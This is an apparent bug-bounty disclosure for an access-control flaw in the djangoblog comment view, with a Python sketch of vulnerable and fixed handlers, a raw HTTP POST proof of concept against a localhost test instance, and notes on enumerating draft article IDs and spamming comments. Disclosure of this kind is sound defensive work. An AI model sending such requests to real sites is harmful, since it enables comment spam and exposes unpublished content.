Improper Access Control in liangliangyy/djangoblog

Valid

Reported on

Feb 13th 2022


Description

The "form_valid" function in comments/views.py saves a user's comment. However, it never checks the state of the target article, so a user can leave comments on a draft article, or on a published article whose comment status is set to closed.
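To make the missing check concrete, here is an added example (not djangoblog's own code, and not the fix in commit 6512ab) that models the "postcomment" handler once without and once with the article-state check. It is framework-free so it runs on its own; the field names status and comment_status, their values, and the in-memory article table are assumptions standing in for the real Django model.

```python
# Added illustration, not code from djangoblog. Field names, status values
# and the article table below are assumptions used only for this example.
from dataclasses import dataclass, field

DRAFT, PUBLISHED = "d", "p"                # assumed article.status values
COMMENTS_OPEN, COMMENTS_CLOSED = "o", "c"  # assumed article.comment_status values


@dataclass
class Article:
    id: int
    status: str
    comment_status: str
    comments: list = field(default_factory=list)


def sample_articles():
    """Constructed sample data mirroring the PoC: 19 is published with
    comments closed, 20 is a draft, 18 is a normal open article."""
    return {
        18: Article(18, PUBLISHED, COMMENTS_OPEN),
        19: Article(19, PUBLISHED, COMMENTS_CLOSED),
        20: Article(20, DRAFT, COMMENTS_OPEN),
    }


def post_comment_vulnerable(articles, article_id, body):
    """Behaviour described in the report: the handler only checks that the
    article exists, then saves the comment regardless of its state."""
    article = articles.get(article_id)
    if article is None:
        return 404
    article.comments.append(body)
    return 200


def post_comment_fixed(articles, article_id, body):
    """Hardened handler: refuse drafts and closed-comment articles before
    anything is saved."""
    article = articles.get(article_id)
    # A draft is answered exactly like a missing article, so the response
    # cannot be used to tell real draft IDs from unused IDs.
    if article is None or article.status != PUBLISHED:
        return 404
    # Published but comments switched off: reject, and do not persist.
    if article.comment_status != COMMENTS_OPEN:
        return 403
    article.comments.append(body)
    return 200


if __name__ == "__main__":
    for handler in (post_comment_vulnerable, post_comment_fixed):
        store = sample_articles()
        results = {aid: handler(store, aid, "comment_in_post_%d" % aid)
                   for aid in (18, 19, 20, 99)}
        print(handler.__name__, results)
```

In a Django class-based view the same two checks belong at the top of form_valid, before the Comment instance is saved; looking the article up by primary key and published status together makes a draft behave like a 404 instead of leaking its existence.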

Proof of Concept

  • Step 1: Log in as admin on a test instance and go to http://localhost:8000/admin/blog/article/. Change the status of article ID 19 to draft (the "选中文章设置为草稿" action, "set selected articles to draft") or close its comments (the "关闭文章评论" action, "close article comments").
  • Step 2: Log in as a normal user (http://localhost:8000/login) and obtain a valid csrftoken cookie, sessionid cookie and csrfmiddlewaretoken form value.
  • Step 3: Send the following request to create a comment on the draft article, or on the published article whose comments are closed:
POST /article/19/postcomment HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Origin: http://127.0.0.1:8000
DNT: 1
Connection: close
Cookie: csrftoken=2iccWTWyKBM4cm0Ii6BkrTOJ2xNdMox6JUP1zlchmG6eUJSkOCXgklgJwuuih5ia; sessionid=pg009zo7zl35ssyk4fsufv64wplpldp9
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=8uHhc1GS64fgzOap298PemIde25fymtrP6k6PtWBI9zqhb21yFuL7OadIZMk33ev&body=comment_in_post_19_disabled&parent_comment_id=&submit=%E5%8F%91%E8%A1%A8%E8%AF%84%E8%AE%BA
  • Step 4: In the admin browser, go to http://localhost:8000/admin/comments/comment/ and confirm that the comment was created.

  • PoC:

Comment in article disabled: https://drive.google.com/file/d/1nD-lbe1aDxATfvJNyX5R81x2aH_4nddl/view?usp=sharing

Send comment: https://drive.google.com/file/d/1wJMdUxhTAB1OGR9pJNG1qayZGcMl_quM/view?usp=sharing

Result: https://drive.google.com/file/d/1ODJRC3SL2rV0dnOdQRLaa_7x9rG0S3zd/view?usp=sharing

Impact

Normal users can leave comments on draft articles and on published articles whose comments are closed. Because the endpoint accepts a comment for any existing article ID, an attacker can also use it to enumerate the IDs of articles in draft mode, and can run comment spam even if the application has disabled comments on every article.

Occurrences

We are processing your report and will contact the liangliangyy/djangoblog team within 24 hours. a year ago
且听风吟 validated this vulnerability a year ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
且听风吟 marked this as fixed in master with commit 6512ab a year ago
且听风吟 has been awarded the fix bounty
This vulnerability will not receive a CVE
views.py#L36 has been validated